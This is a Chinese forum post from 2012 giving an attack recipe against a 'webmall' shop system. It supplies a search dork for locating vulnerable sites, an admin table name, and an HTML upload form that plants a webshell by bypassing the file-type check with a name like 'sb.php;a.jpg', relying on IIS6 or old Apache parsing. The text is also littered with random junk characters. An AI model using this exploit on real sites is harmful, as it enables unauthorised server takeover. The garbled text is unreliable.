关键字:inurl:webmall/detail.php?id# g% F5 R7 M5 \1 s+ L$ W) ?
9 f5 M" y% `: C- ~8 Z4 |- ~: r数据表:pwn_base_admin7 A5 z( r0 @/ A" l
# z1 V4 B: V; l7 E7 E) g1 n关于拿shell
4 ^$ c% Z( s+ U0 L/ }" X( B # c0 \7 Z: H4 i0 F1 l* r* ?, }
首先登录后台admin.php2 g( l' H0 Q( w" r8 J% O
5 W/ e! F; L [+ N) j4 p% t( ~
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。 J% p' f( L. \) ]
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg3 A+ G2 B4 s. _* s+ Y
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的1 O( x/ w: t$ `+ X# L
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> n r; j) s) G9 t7 ?& Q
<input type="text" name="fileName" value="sb.php;a.jpg" /> * J' D# d, X( J/ ~+ d/ }
<input type="hidden" name="attachPath" value="news/pics/" />
+ Z+ |0 i, t( \<input type="file" name="fileData" size="14" /></td>
* T# @5 h |+ J/ I<input type="submit" name="button" value="确定" /> : R; S, w: Q! f: y2 Z
</form>
( M3 J# A/ u1 D0 x, R 5 Z y, M( c! _1 N9 {7 b
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
; S& ]! _2 @" N- v% w! z: i9 F- }! w! F. s
|
发表于 2012-11-9 20:52:15
收藏
支持
反对